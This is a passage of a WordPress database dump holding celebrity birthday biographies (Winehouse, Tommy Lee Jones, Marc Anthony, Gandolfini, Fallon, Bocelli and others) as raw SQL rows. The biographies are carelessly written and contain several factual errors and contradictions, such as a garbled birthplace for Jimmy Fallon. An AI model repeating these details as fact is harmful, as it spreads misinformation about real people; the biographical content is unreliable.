400;\">Winehouse married, who she called, “the male version of herself” - Blake Fielder-Civil- in 2007. The two had an extremely dysfunctional marriage and arguably brought out the worst in one another. Winehouse struggled with depression, anxiety, self-harm, eating disorders and drug and alcohol addictions, and Fielder-Civil struggled with much of the same. The two would frequently fight eachother violently, and reconcile soon after. They divorced in 2009. </span>\r\n\r\n<span style=\"font-weight: 400;\">Winehouse was considered to be a bit of a loose cannon, acting violently toward anyone that said something to her that she didn\'t care for. This was fueled by her <a href=\"http://www.theguardian.com/commentisfree/2011/oct/26/amy-winehouse-addiction-alcohol\" target=\"_blank\">substance abuse</a>, and resulted in many arrests for assault, and hospitalizations. </span>\r\n\r\n<span style=\"font-weight: 400;\">Her addiction to crack cocaine, heroin, alcohol and ketamine made her sick and weak early on, and by 2008 it was reported that she had emphysema. Winehouse would cease all substance abuse for weeks at a time, and then relapse. </span>\r\n\r\n<span style=\"font-weight: 400;\">Despite her struggles, Winehouse did much for other people in the way of charity, particularly charities concerned with children. Unfortunately, this is the side of Winehouse that was often overlooked due to her more prominent portrayal of herself and her struggles, but she was known by those she loved for her generosity. She supported hundreds of charities, small and well known, when she was alive. </span>\r\n<h2><span style=\"font-weight: 400;\">Where They Are Now </span></h2>\r\n<span style=\"font-weight: 400;\">Winehouse died of alcohol poisoning at her home in Camden, London on July 23, 2011. Her bodyguard noticed that she was intoxicated a few days before her death, and when he attempted to rouse her the morning of her death, he thought she was passed out. He left and came back later; realizing she was in the same position than when he left her, he called an ambulance. She was pronounced dead on the scene. The coroner\'s report explained that Winehouse\'s blood alcohol content was .416% at the time of her death. </span>\r\n\r\n<span style=\"font-weight: 400;\">Today, memoirs, memorials, awards, tributes, and charities have been opened and created in honor of Winehouse. </span>\r\n\r\n<span style=\"font-weight: 400;\"><a href=\"https://www.flickr.com/photos/click_bang/479287160/sizes/z/\" target=\"_blank\">[Image]</a></span>\r\n\r\n ','Amy Winehouse','','publish','open','open','','amy-winehouse','','','2015-10-09 16:47:25','2015-10-09 16:47:25','',0,'http://birthdaypedia.com/?p=269',0,'post','',0),(270,2,'2015-09-15 22:25:24','2015-09-15 22:25:24','','Amy Winehouse','','inherit','open','closed','','amy-winehouse','','','2015-09-15 22:25:24','2015-09-15 22:25:24','',269,'http://birthdaypedia.com/wp-content/uploads/2015/09/Amy-Winehouse.jpg',0,'attachment','image/jpeg',0),(272,2,'2015-09-15 07:31:55','2015-09-15 07:31:55','<strong>In The Beginning</strong>\r\n\r\nTommy Lee Jones was born on September 15, 1946. His birthplace is <a href=\"https://en.wikipedia.org/wiki/San_Saba,_Texas\" target=\"_blank\">San Saba, Texas</a>. His mother Lucille Marie wore many hats. She was a beauty shop owner, police officer, and school teacher. His father, Clyde C. Jones, worked as an old field worker. The were married for a while and divorced twice over the course of their marriage. Tommy Lee Jones was raised in Midland, Texas where he attended the Robert E. Lee High School.\r\n\r\nJones was able to graduate from the St. Mark\'s School of Texas since he attended it on a scholarship. He even attended Harvard College too on a scholarship that was need-based. He stayed with the Mower B-12 as a freshman right across the hall from the future vice president Al Gore. Jones was an upperclassmen and and stayed in the Dunster House.\r\n\r\nJones later moved to New York so he could become an actor. He made his debut on Broadway in 1969 in <em>A Patriot for Me</em>. He played in a number for a few supporting roles. In 1970 he was able to land his first film role playing a Harvard student in the movie <em>Love Story</em>.\r\n\r\n<strong>Career Accomplishments</strong>\r\n\r\nJones received his first <a href=\"https://en.wikipedia.org/wiki/Golden_Globe_Award\" target=\"_blank\">Golden Globe nomination</a> for his portrayal of a country singer Loretta Lynn\'s husband, who was Doolittle “Mooney” Lynn. The movie was called the <em>Coal Miner\'s Daughter</em> and was rather popular for it\'s time. In 1983 he even received an Emmy for Best Actor for the performance he did as the murdered in Gary Gilmore. The TV adaptation for Norman Mailer\'s <em>The Executioner\'s Song</em>. It was also the same year he played a role in the pirate adventure, <em>Nate and Hayes</em>, where he played the pirate Captain Bully Hayes.\r\n\r\nIn 1989 he earned yet another Emmy nomination for the portrayal he did of the Texas Ranger lawman Woodrow F. Call. It was for the television mini-series <em>Lonesome Dove</em>.\r\n\r\n<strong>Most Known For</strong>\r\n\r\nThe roles Jones is more known for is his appearance with Ben Affleck in the drama T<em>he Company Men</em>. He has also had a role with the Marvel Studios film, <em>Captain America: The First Avenger</em>. He also co-starred, directed, and produced with Samuel L. Jackson for the adaption of <em>The Sunset Limited</em>. He didn\'t see the turning point of his career though until he did a reprisal of his role of Agent K in <em>Men in Black 3</em>. He also co-starred as Thaddeus Stevens in the Steven Spielberg\'s film <em>Lincoln</em>. Jones received an <a href=\"http://www.imdb.com/name/nm0000169/awards\" target=\"_blank\">Oscar</a> nomination for Best Supporting Actor.\r\n\r\n<strong>Current Personal Life</strong>\r\n\r\nJones gave a nominating speech at the 2000 Democratic National Convention for Al Gore for the Democratic Party\'s nominee for President of the United States. Jones even married a woman named Kate Lardner whose the daughter of the journalist and screenwriter Ring Lardner Jr. from 1971 – 1978. In his second marriage to Kimberla Cloughley he has two children. He eventually married his third wife, a woman by the name of Dawn Laurel.\r\n\r\n<strong>Where Are They Now</strong>\r\n\r\nJones\' personal life has become a bit more quieter in his later years. He now lives in Terrell Hills, Texas. He is able to speak fluent Spanish too. Jones owns a 3,000 acre cattle ranch in San Saba County, Texas. He even owns a ranch near Van Horn, Texas too. The ranch became the set for a film of his called <em>The Three Burials of Melquiades Estrada</em>.\r\n\r\nJones even owns a farm and home in polo mecca Wellington, Florida. Jones is highly talented as a polo player and has a house near a polo country club located in Buenos Aires, Argentina. He is an adamant support of the Polo Training Foundation. He can often be seen at the court-side of Spurs games too.\r\n\r\n \r\n\r\n<a href=\"https://www.flickr.com/photos/vdo_vault/298902986/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Tommy Lee Jones','','publish','open','open','','tommy-lee-jones','','','2015-10-09 16:46:01','2015-10-09 16:46:01','',0,'http://birthdaypedia.com/?p=272',0,'post','',0),(273,2,'2015-09-16 07:31:58','2015-09-16 07:31:58','<h3>In the Beginning</h3>\r\nMarco Antonio Muniz was born on September 16, 1968. He was born in New York City. His parents are from Guayama, Puerto Rico. His father is Felipe Muniz who worked as a hospital lunchroom worker and a musician. His mother was Guillermina who worked as a housewife. His parents had named Anthony after the Mexican singer Marco Antonio Muniz. He grew up in East Harlem and is the youngest out of his eight surviving sibling. He was also raised in the Roman Catholic faith.\r\n\r\nMarco started his singing career as a session vocalist for freestyle. He even performed as a freestyle vocalist in the Underground New York house music acts. He even changed his name in order to avoid confusion with the singer he was named after. He began to work as a backing vocalist and a songwriter as well for Latin Rascals and Menudo. He came out with is first freestyle album called “Rebel” which debuted in 1988 with Bluedog Records.\r\n<h3>Career Accomplishments</h3>\r\nMarco did a follow-up in 1995 for Todo a sue tiempo and ended up winning the Billboard award for Hot Tropical Artist of the Year. His album even received a Grammy nomination for his songs. The album itself sold over 800,000 copies. After a while it even became a gold record in Puerto Rico and the United States.\r\n\r\nMarco\'s climb up the fame ladder didn\'t end there either. He made a Spanish language album called “Contra La Coriente” which was followed up with a television special called, “Marc Anthony: The Concert from Madison Square Garden.” The special was broadcasted on HBO right on Valentine\'s Day in 2000. Soon after the special was nominated for the Music Special of the Year by TV guide. Marco even got a No. 1 single on the Billboard Hot Latin Tracks and was the first one to be done by a salsa musician. His album also became the first salsa album ever to ever reach the English language Billboard 200 chart.\r\n\r\nHe even won a Latin Grammy award for best Latin Pop Album of the year for his album “Sin Mentiras”. His album “Vivir Mi Vida” was released in July 2013 and soon became certified Platinum.\r\n<h3>Most Known For</h3>\r\nMarco is best well known for his music. However, he has a small acting career as well. Many people may remember his “Vivir Mi Vida” first. He has played a handful of roles over the course of his career. He worked alongside his ex-wife Lopez on a 2011 Latin talent series originally created by Simon Fuller called “<a href=\"https://en.wikipedia.org/wiki/Q%27Viva!_The_Chosen\" target=\"_blank\">Q\'Viva! The Chosen</a>”. The series was about following Anthony and Lopez as they traveled across 21 countries searching for new talent. Marco even guest mentored in 2012 on The X Factor for Season 2.\r\n<h3>Current Personal Life</h3>\r\nMarco supports the Democratic Party. Even performing “The Star Spangled Banner” for the 2012 Democratic National Convention. In 2013 he sang “God Bless America” for the 2013 Major League Baseball All-Star Game in Citi Field.\r\n<h3>Where Are They Now</h3>\r\nMarco has had some trouble in recent years. He married Jenniffer Lopez in June 2004. Later she gave birth to twins in February 22, 2008. People magazine forked over $6 million for the first couple of photos of the twins. In 2009 the couple purchased a stake in the Miami Dolphins. They even paired up with a couple of personalities in order to buy small stakes in the club.\r\n\r\nThey do own two houses they bought in Brookville, New York. Sadly, the couple announced they were separating in July 2011. Marco filed for divorce on April 9, 2012. The divorce was finalized on June 18, 2015. Lopez does retain primary physical custody of their two children. Marco later married the model <a href=\"http://heavy.com/entertainment/2014/11/shannon-de-lima-marc-anthonys-wife-married-wedding-girlfriend/\" target=\"_blank\">Shannon de Lima</a> in November 11, 2014 in the Dominican Republic.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Marc_Anthony_2010.jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Marc Anthony','','publish','open','open','','marc-anthony','','','2015-10-09 16:45:40','2015-10-09 16:45:40','',0,'http://birthdaypedia.com/?p=273',0,'post','',0),(274,2,'2015-09-17 09:32:00','2015-09-17 09:32:00','<h3>In the Beginning</h3>\r\nKyle Martin Chandler was born on September 17, 1965. His birthplace is Buffalo, New York. Chandler is the four child of Edward Chandler who worked as a cigarette sales representative and farm owner. Sally Jeanette, the mother of Kyle Chandler, worked as a dog breeder. Chandler\'s older broth even helped Chandler to develop a Southern accent for <em>Bloodline</em> and <em><a href=\"http://www.imdb.com/title/tt0390022/\" target=\"_blank\">Friday Night Lights</a></em>.\r\n\r\nChandler was raised around Chicago, Illnois. When he turned eleven his family decided to move to Loganville, Georgia. Chandler\'s parents raised show dogs and even brought him along to dog shows when he was a child.\r\n\r\nChandler\'s interest for the theater didn\'t start until he enrolled in the theater program at Walton. Once he graduated high school Chandler went on to attend University of Georgia. He was a drama member and major for the 1984 Sigma Nu fraternity. Chandler was able to to get a bachelor\'s degree in 1988 in drama, but dropped out of the university in order to pursue a deal he was offered for television.\r\n<h3>Career Accomplishments</h3>\r\nChandler is best known for his roles on the big screen. He play Bruce Baxter, the 1930 films star in the film <em>King Kong</em>. Later on Chandler even played John Driscoll in the film <em>The Day the Earth Stood Still</em>. He had an Emmy nominated guest role he did on Grey\'s Anatomy. Chandler has won the Primetime Emmy Award for Outstanding Lead Actor in a Drama Series due to the role he played as Coach Tayler for the final season of the show <em>Friday Night Lights</em>.\r\n<h3>Most Known For</h3>\r\nChandler is known for many of the roles he\'s played over the years. <em>Friday Night Lights</em> is one of them, but there are a few others he\'s starred in people may recognize him for. Chandler has appeared in <em><a href=\"http://www.imdb.com/title/tt0993846/\" target=\"_blank\">The Wolf of Wall Street</a></em> when it was released in 2013. He played the role of Patrick Denham in the film who is an FBI agent in the movie.\r\n\r\nChandler played the lead role in a science fiction movie called <em>Super 8</em>. Recently Chandler has played in the Netflix original series <em>Bloodline</em> as well.\r\n<h3>Current Personal Life</h3>\r\nChandler has lived in the Los Angeles area since the late 1980s when he was just starting out with his acting career. In 2007 him and his family did live on a 33 acre spread in Dripping Springs, Texas. Even his mother came to live with him and the family towards the end of her life. She passed away in 2014. He has even served as a volunteer firefighter too. Chandler also participates in a charity gold tournament at the Wolfdancer in order to help raise funds for the football players suffering from spinal injuries.\r\n<h3>Where Are They Now</h3>\r\nChandler married Kathryn Macquarrie in 1995. He met his wife in the dog park during the 1990s. They have since had tow daughters, Sawyer and Sydney. His daughter Sawyer and Chandler have been very active in order the end shark finning.\r\n\r\nChandler has done a lot with his life. It\'s a rather colorful, but interesting background he has. In college he was involved with drama, but dropped out due to a television deal he received. He started out on a rather high note and has continued to maintain it ever since. While Chandler may not have the most glamours career when compared to other actors. He gives back to the community in many ways and has kept his career steady throughout the entire time. It\'s going to be interesting where Chandler\'s career is going to lead him next on his journey.\r\n\r\n<a href=\"https://www.flickr.com/photos/charliellewellin/3389404761/sizes/o/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Kyle Chandler','','publish','open','open','','kyle-chandler','','','2015-10-09 16:44:52','2015-10-09 16:44:52','',0,'http://birthdaypedia.com/?p=274',0,'post','',0),(275,2,'2015-09-18 08:32:04','2015-09-18 08:32:04','<h3>In the Beginning</h3>\r\nJames Gandolfini was born on September 18, 1961. He passed away on June 19, 2013. He was born in Westwood, New Jersey. His mother was of Italian ancestry and worked as a lunch lady in a high school. His father, James Joseph Gandolfini Sr., is a native of <a href=\"https://en.wikipedia.org/wiki/Borgo_Val_di_Taro\" target=\"_blank\">Borgo Val di Taro, Italy</a>. He worked as a head janitor at the Paramus Catholic High School in New Jersey, cement mason, and bricklayer. Due to the upbringing of his parents, Gandolfini grew up with a strong sense of his Italian American identity. He was raised as a devout Roman Catholic and even visited Italy on a regular basis. He also had two sisters.\r\n\r\nGandolfini started his career on Broadway in the 1992 production of <em>On the Waterfront</em>. He performed for six weeks and managed to get an early film role playing a mob enforcer for a film in 1993 called <em>True Romance</em>.\r\n<h3>Career Accomplishments</h3>\r\nGandolfini has won three Emmy\'s for the “<a href=\"https://www.quora.com/Was-James-Gandolfini-the-best-actor-in-the-best-television-drama-ever\" target=\"_blank\">Best Actor in a Drama</a>”. Entertainment Weekly has even listed the actor as the 42<sup>nd</sup> Greatest TV Icon of All Time. Gandolfini has also received a number of nominations along with two SAG awards. Gandolfini was also the person responsible for the HBO documentary which focused on Iraq War Veterans and the devotion they had to America. The documentary surveyed the emotional and physical costs of war.\r\n<h3>Most Known For</h3>\r\nGandolfini is best known for his performance as Tony Soprano and the famous HBO drama called <em><a href=\"http://www.imdb.com/title/tt0141842/\" target=\"_blank\">The Sopranos</a></em>. He played as a family man and a New Jersey mob boss. Before his death he also completed two films as well. The first on was called <em>Enough Said</em>, which was a romantic comedy. He even received Best Supporting Actor awards after his death from the Chicago Film Critics Association and Boston Society of Film Critics. Along with several nominations. Gandolfini\'s final performance for film was for <em>The Drop</em> which was a crime drama.\r\n<h3>Current Personal Life</h3>\r\nGandolfini kept close ties with Park Ridge, New Jersey. He supported the Octoberwoman Foundation for Breast Cancer Research. He even showed up to the annual October banquet for it. Even bringing along cast members from <em>The Sopranos</em> in order to help draw large crowds. He lived in New York City and even owns a lot in Lake Manitoba Narrows.\r\n\r\nGandolfini divorced his wife, Marcy Wudarski, in 2002. They had a son whom they named Michael who was born in 2000. Gandolfini met the actress and model Deborah Lin. He marred her on August 30, 2008. They had a daughter who was born on October 10, 2012.\r\n<h3>Where Are They Now</h3>\r\nUnfortunately, Gandolfini died on June 19, 2013 when he was only 51 years old. It happened during a vacation he was taking in Rome, Italy. He had been expecting to travel to Sicily for a couple of days to receive a award at the Taormina Film Fest. His family had spent most of the day sightseeing in the heat. His son, Michael, found him unconscious on the floor of their bathroom at the Boscolo Exedra Hotel. The paramedics was called, but Gandolfini was pronounced dead an hour later after he was found. When an autopsy was done later it was confirmed he had passed away due to a heart attack.\r\n\r\nThe day right after Gandolfini had passed away. The E Street Band and Bruce Springsteen dedicated a performance of “Born to Run” to Gandolfini. His body was returned to the US on June 23, 2013. Michael Kobold, the family spokesman, thanked the American and Italian authors for expedition the reparation process. Four days later Gandolfini\'s funeral took place at the Episcopal Cathedral of Saint John the Divine in Morningside Heights, New York. He was cremated later and his ashes handed over to the family.\r\n\r\n<a href=\"https://www.flickr.com/photos/neilmcintyre/1347778748/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','James Gandolfini','','publish','open','open','','james-gandolfini','','','2015-10-09 16:44:16','2015-10-09 16:44:16','',0,'http://birthdaypedia.com/?p=275',0,'post','',0),(276,2,'2015-09-21 07:32:06','2015-09-21 07:32:06',' \r\n<h3>In the Beginning</h3>\r\nJimmy Fallon was born on September 19, 1974 in <a href=\"https://en.wikipedia.org/wiki/Newark_Bay_Bridge\" target=\"_blank\">Bay Bridge, New York</a>. He is the son of James W. Fallon and Gloria Feeley. His father was a Vietnam war Veteran and after Fallon\'s birth. He worked as a machine repairman for IBM in Kingston, New York. His family eventually moved to Saugerties, New York. Fallon\'s childhood was idyllic for the most part. His parents were noted as being overprotective of Fallon while he was a child. Gloria, his sister, were not even allowed to ride their bikes outside of the backyard.\r\n\r\nDuring his teen years Fallon started to show signs of his interest in comedy. He impressed his parents how he could do a number of impersonations. He started to become more interested in comedy and spent quite few nights recording the radio program <em>The Dr. Demento Show</em>.\r\n\r\nHe graduated from Saugerties High School in 1992. He started to perform in stage product and twice he became a class social director. He even managed to win a young comedian\'s contest duing on impression of Pee-wee Herman. During his time at The College of Saint Rose in Albany, New York. He received a major in Computer Science, and switched to Communications during his senior year. He did stand up gigs during the weekends. He even performed sets in Times Square.\r\n<h3>Career Accomplishments</h3>\r\nJimmy Fallon auditioned twice for the <em><a href=\"https://en.wikipedia.org/wiki/Saturday_Night_Live\" target=\"_blank\">Saturday Night Live Show</a></em>. He was able to do well on his second audition and snagged the open spot. As soon as he started he became a huge hit on the show. He released a book that was filled with e-mails he exchanged with his sister called <em>I Hate This Place: A Pessimist\'s Guide to Life</em>. During his career he even hosted the 2001 MTV Movie Awards and the 2002 MTV Video Music Awards. <em>People</em> magazine even named him as one of the 50 Most Beautiful People in 2002.\r\n<h3>Most Known For</h3>\r\nJimmy Fallon is mostly known for his performance and sketches he did on <em>Saturday Night Live</em>. He did try for a time to make a hit in a movie career, but it never took off. Fans soon came to know him for his show <em><a href=\"http://www.nbc.com/the-tonight-show\" target=\"_blank\">Late Night with Jimmy Fallon</a></em> in 2009 to 2013. Quite recently he has ended up on <em>The Tonight Show</em> and has continued to star on their ever since.\r\n<h3>Current Personal Life</h3>\r\nIn 1992 to 2009 Fallon had been registered as a Republican. He married the film producer, Nancy Juvonen, on December 22, 2007. They had two daughters in recent years. A daughter in 2013 they named Winnie Rose Fallon. Their other daughter was born in 2014 and was named Frances Cole Fallon.\r\n\r\nFallon identifies his faith as Catholic. As a child he wished to become a priest. He also has a Golden Retriver named Gary Frick who has made an appearance on the <em>Late Night with Jimmy Fallon</em> show.\r\n<h3>Where Are They Now</h3>\r\nFallon appeared on the <em>The Dr. Oz Show</em> on February 22, 2011. He had a mole removed from his left hand by a cosmetic surgeon in front of a live studio audience. On June 26, 2015 Fallon suffered an injury called a ring avulsion. He tripped over a rug and his ring became caught on a counter top. Nearly tearing his finger off. He was rushed to the emergency room where a surgeon performed microsurgery on his finger. Fallon had to spend ten days in the ICU before being allowed to go home.\r\n\r\nIn July during his 13<sup>th</sup> episode of the <em>Tonight Show</em> he thanked the nurses and doctors who helped him with his finger. On July 14, 2015 he has expected to spend eight weeks without having feeling in his finger.\r\n\r\n<a href=\"https://www.flickr.com/photos/orgbuzz/3617546630/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Jimmy Fallon','','publish','open','open','','jimmy-fallon','','','2015-10-09 16:42:40','2015-10-09 16:42:40','',0,'http://birthdaypedia.com/?p=276',0,'post','',0),(277,2,'2015-09-28 17:43:29','2015-09-28 17:43:29','','Tommy Lee Jones','','inherit','open','closed','','tommy-lee-jones','','','2015-09-28 17:43:29','2015-09-28 17:43:29','',272,'http://birthdaypedia.com/wp-content/uploads/2015/09/Tommy-Lee-Jones.jpg',0,'attachment','image/jpeg',0),(278,2,'2015-09-28 17:54:31','2015-09-28 17:54:31','','Marc Anthony','','inherit','open','closed','','marc-anthony','','','2015-09-28 17:54:31','2015-09-28 17:54:31','',273,'http://birthdaypedia.com/wp-content/uploads/2015/09/Marc-Anthony.jpg',0,'attachment','image/jpeg',0),(280,2,'2015-09-28 18:15:54','2015-09-28 18:15:54','','Kyle Chandler','','inherit','open','closed','','kyle-chandler','','','2015-09-28 18:15:54','2015-09-28 18:15:54','',274,'http://birthdaypedia.com/wp-content/uploads/2015/09/Kyle-Chandler.jpg',0,'attachment','image/jpeg',0),(282,2,'2015-09-28 18:30:58','2015-09-28 18:30:58','','James Gandolfini','','inherit','open','closed','','james-gandolfini','','','2015-09-28 18:30:58','2015-09-28 18:30:58','',275,'http://birthdaypedia.com/wp-content/uploads/2015/09/James-Gandolfini.jpg',0,'attachment','image/jpeg',0),(284,2,'2015-09-28 18:38:26','2015-09-28 18:38:26','','Jimmy Fallon','','inherit','open','closed','','jimmy-fallon','','','2015-09-28 18:38:26','2015-09-28 18:38:26','',276,'http://birthdaypedia.com/wp-content/uploads/2015/09/Jimmy-Fallon.jpg',0,'attachment','image/jpeg',0),(294,2,'2015-09-22 13:37:13','2015-09-22 13:37:13','<h3>In the Beginning</h3>\r\nAndrea Bocelli was born on September 22, 1958 in Italy. His parents were Edi and Alessandro Bocelli. They all lived on a family farm where they sold farm machinery and made wine in a small village. Bocelli\'s younger brother Alberto and mother lived in the family home, but his father passed away in 2000.\r\n\r\nBocelli was born with poor eyesight. As a child he had already begun to show a passion for music. His mother has even stated music was the only thing to give Bocelli comfort. When he was six years old he began piano lessons. Other instruments he learned how to play were the drums, flute, guitar, saxophone, trombone, and trumpet. He also sang during his childhood as well. He won his first singing competition at 14 years old. Bocelli went on to study law at the University of Pisa 1980.\r\n\r\nIn order to make more money Bocelli also performed in the evenings at piano bars. He eventually completed law school and did in fact spend a year working as a court appointed lawyer. In 1987 he also met Enrica, his future wife.\r\n<h3>Career Accomplishments</h3>\r\nBocelli\'s career kicked off rather well. He\'s an Italian singer, songwriter, classical tenor, and recording artist. So far he has recorded 14 studio albums. Including classical and pop music. He\'s even completed nine operas, had three greatest hit albums, and has sold 150 million records worldwide. In 1998 he was even named as one of <em>People\'s</em> 50 Most Beautiful People. Bocelli has even been nominated for the Grammy Award “Best New Artist” for a duet he did with Celine Dion called “<a href=\"https://en.wikipedia.org/wiki/The_Prayer_(Celine_Dion_and_Andrea_Bocelli_song)\" target=\"_blank\">The Prayer</a>”. The song won the Golden Globe for Best Original Song. Even going on to be nominated for an Academy Award.\r\n\r\nAs if that wasn\'t enough success. Bocelli managed to get a listing in the Guinness Book of World Records for hold three spots in the US C Albums charts at once. Seven of his albums have skyrocketed to the top 10 Bllboard 200 too.\r\n<h3>Most Known For</h3>\r\nBocelli is well known for <em><a href=\"https://en.wikipedia.org/wiki/Sacred_Arias_(Andrea_Bocelli_album)\" target=\"_blank\">Sacred Aria</a></em>. For its time the album became the best classical crossover to sell. Selling 20 million copies worldwide. Romanza is another one in 1997 that became the best selling album by an Italian artist in the history of the genre. In more recent times Bocelli has been made a Grand Office of the <a href=\"https://en.wikipedia.org/wiki/Order_of_Merit_of_the_Italian_Republic\" target=\"_blank\">Order of Merit of the Italian Republic</a> in 2006. On March 2, 2010 he received honor as a star at the Hollywood Walk of Fame for the contributions he has made to Live Theater.\r\n<h3>Current Personal Life</h3>\r\nBocelli met Enrica Cenzatti, his first wife, during his time singing at piano bars in the early part of his career. They marred on June 27, 1992. They had two children. Their first born was Amos, who was born in 1995. Their second son, Matteo, was born in 1997. The couple decided to separate in 2002.\r\n\r\nBocelli now lives his second wife Veronica. Bocelli than saw his third child born, his daughter Virginia, on March 21, 2012. His first wife still resides in the previous house the couple used to live in Versilia. Bocelli finally married Veronica on Mar 21, 2014 in the Sanctuary of Montenero in the town of Livorno, Italy.\r\n<h3>Where Are They Now</h3>\r\nIn 2006 Bocelli influenced his hometown, Lajatico, so much they build an outdoor theater called “Teatro del Silenzo”. He performs for one night only each July and is its honorary president. After his one performance the theater continues to remain silent for the rest of the year.\r\n\r\nIn October 2013 he also purchased another home in North Miami Beach.\r\n\r\n<a href=\"https://www.flickr.com/photos/sharongraphics/4402293319/sizes/z/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Andrea Bocelli','','publish','open','open','','andrea-bocelli','','','2015-10-09 16:41:39','2015-10-09 16:41:39','',0,'http://birthdaypedia.com/?p=294',0,'post','',0),(295,2,'2015-09-23 14:55:36','2015-09-23 14:55:36','<h3>In the Beginning</h3>\r\nSkylar was born on September 23, 1987 in New York City. His parents were Barry and Meryl Lipstein. His father worked as a garment industry executive. Skylar grew up in the <a href=\"http://rocklandgov.com/\" target=\"_blank\">Rockland County, New York</a> area. He also has two brothers named Jace and Milan, along with his sister Brielle. He graduated from Clarkstown High School North. Going on to attend Stagedoor Manor at a performing arts summer camp. He even became a student at the Tisch School of the Arts at New York University.\r\n\r\nHe did have to take a leap of absence when he had to cast a role in <em>Spring Awakening</em>. At only the age of 15 his agent selected a middle name for Skylar, Astin, which became his stage name.\r\n<h3>Career Accomplishments</h3>\r\nSkylar starred in the award winning <em><a href=\"http://www.springawakeningthemusical.com/\" target=\"_blank\">Spring Awakening</a></em> which was a Broadway Musical. He played the character of Georg. A male student who has a crush on the piano teacher. He has a handful of solos in song, but is remembered mostly for the song called <em>Touch Me</em>. During his time starring in the musical. Skylar has also been filmed in to move <em>Hamlet 2</em> as the character Rand Posin.\r\n\r\nSkylar even sang “Raped in the Face” on the soundtrack with Phoebe Strole. There were screenings of the film at the Sundance Film Festival in 2008. Astin even signed on with the United Talent Agency.\r\n<h3>Most Known For</h3>\r\nSkylar at the moment is still well known for his role in the Broadway musical <em>Spring Awakening</em>. His role in <em>Hamlet 2</em> is also a huge part of helping him to build his career as well. In 2010, Astin played the role of Mark Cohen in the musical production called <em>Rent</em>. Skylar even guest starred as Ben in an episode of <em>Love Bites</em> called “Boys to Men”.\r\n\r\nAstin didn\'t see a huge breakthrough until he starred in the 2012 comedy film called <em><a href=\"http://www.imdb.com/title/tt1981677/\" target=\"_blank\">Pitch Perfect</a></em>. He came back in 2015 in the sequel <em>Pitch Perfect 2</em>. He even starred in another comedy film in 2013 called <em>21 and Over</em>. Quite recently Skylar is starring in the sitcom on TBS called <em>Ground Floor</em>.\r\n<h3>Current Personal Life</h3>\r\nAt the moment, Astin is currently in a relationship with his co-star Anna Camp from <em>Pitch Perfect</em>. The relationship has been going on since July 2013. There is no news if the two will be marrying anytime soon, but it appears to be going steady.\r\n<h3>Where Are They Now</h3>\r\nAstin is still building up his reputation as an actor. Recently he has been starring in the sitcom <em>Ground Floor </em>as the character Brody Moyer. The character he plays is a money manager who falls in love with a girl who is on the ground floor. Astin is set to have a lead role in an upcoming comedy from NBA that is going to be on the ABC.\r\n\r\nAstin is still building his career as an actor. He\'s had a few good roles since he has first been cast in Broadway. He has a good talent as an actor, but he\'s still growing. Skylar Astin is certainly set for greatness though. If he continues at the pace he\'s going now. Skylar Astin could quite easily become a household name. The only thing holding him back at this point is being able to score bigger roles. If Skylar is able to get his name out there more and score maybe one or two big roles. He\'ll be able to rise up higher than ever. Regardless, he\'s an excellent actor. He is certainly going to go very far in his career.\r\n\r\n<a href=\"https://www.flickr.com/photos/chrismoody1111/15916540586/sizes/l\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Skylar Astin','','publish','open','open','','skylar-astin','','','2015-10-09 16:41:12','2015-10-09 16:41:12','',0,'http://birthdaypedia.com/?p=295',0,'post','',0),(300,2,'2015-09-29 13:42:45','2015-09-29 13:42:45','','Andrea Bocelli','','inherit','open','closed','','andrea-bocelli','','','2015-09-29 13:42:45','2015-09-29 13:42:45','',294,'http://birthdaypedia.com/wp-content/uploads/2015/09/Andrea-Bocelli.jpg',0,'attachment','image/jpeg',0),(302,2,'2015-09-30 09:53:59','2015-09-30 09:53:59','<h3>In the Beginning</h3>\r\nMarion Cotillard was born on September 30, 1975 in Paris, France. She grew up near Orléans in a household which was artistically inclined. Her mother is Niseema Theillaud, a drama teacher and an actress. Her father is Jean Claude Cotillard who worked as a 2006 Molière Award-winning director, former mime, teacher, and actor. She has two younger brothers who are twins, Guillaume and Quentin. Guillaume went on to become a director and screenwriter. Cotillard started acting even during her childhood. Even appearing on the stage for one of her father\'s plays.\r\n\r\nAfter a few small performances and appearances in theater. Cotillard began to receive minor roles in television series like <em><a href=\"http://www.imdb.com/title/tt0601388/\" target=\"_blank\">Highlander</a></em>. She acted in her first English speaking role when she was only 17 years old, and played the role of Lore Bellian in the episode titled “Nowhere to Run”. She even has an uncredited role in another episode titled “Saving Grace” where she appears as giving birth in once scene. Her true career as a film actress did not start until the middle of the 1990s. She managed to get into small roles in films like <em>My Sex Life...Or How I Got Into an Argument </em>and even in a comedy called <em>La Belle Verte</em>.\r\n<h3>Career Accomplishments</h3>\r\nMarion Cotillard has achieved worldwide fame and even awards for her performances in films like <em>The Immigrant</em>, <em>A Very Long Engagement</em>, <em>Nine</em>, <em>La Vie en Rose</em>, and other films. She received critical acclaim and awards for the role she played in <em><a href=\"https://en.wikipedia.org/wiki/La_Vie_en_rose_(film)\" target=\"_blank\">La Vie en Rose</a></em>. The awards she received included the Golden Globe Award for Best Actress, an Academy Award, César Award, and the <a href=\"http://awards.bafta.org/\" target=\"_blank\">BAFTA Award</a>.\r\n\r\nAs of 2015, Cotillard is the only actor ever to win an Academy Award for a performance in the French language. In 2010 she also received a Critics\' Choice Award and Golden nominations for the amazing performance she did in the musical film <em>Nine</em>.\r\n<h3>Most Known For</h3>\r\nMarion Cotillard is well known for the roles she has played in past film performances. Many fans will recognize her for the films she starred in like: <em>A Very Long Engagement</em> in 2004, <em>La Vie en Rose</em> in 2007, <em>Nine</em> in 2009, <em>Inception</em> in 2010, <em>The Immigrant</em> in 2013, and <em>Two Days, One Night</em> in 2014. Her films are a worldwide success too. Grossing in over $3 billion for the worldwide box office. In 2014 she has even been named “The Most Bankable French Actress of the 21<sup>st</sup> Century.”\r\n<h3>Current Personal Life</h3>\r\nDuring the late 1990s, she was in a relationship with a French actor named Julien Rassam. During 2000 to 2005 Cotillard was in a relationship with another French actor by the name of Stéphan Guérin-Tillié. The relationship ended and Cotillard dated a French singer called Sinclair from 2005 to 2007.\r\n\r\nIn October of 2007 she has been in a relationship with a French director and actor Guillaume Canet. 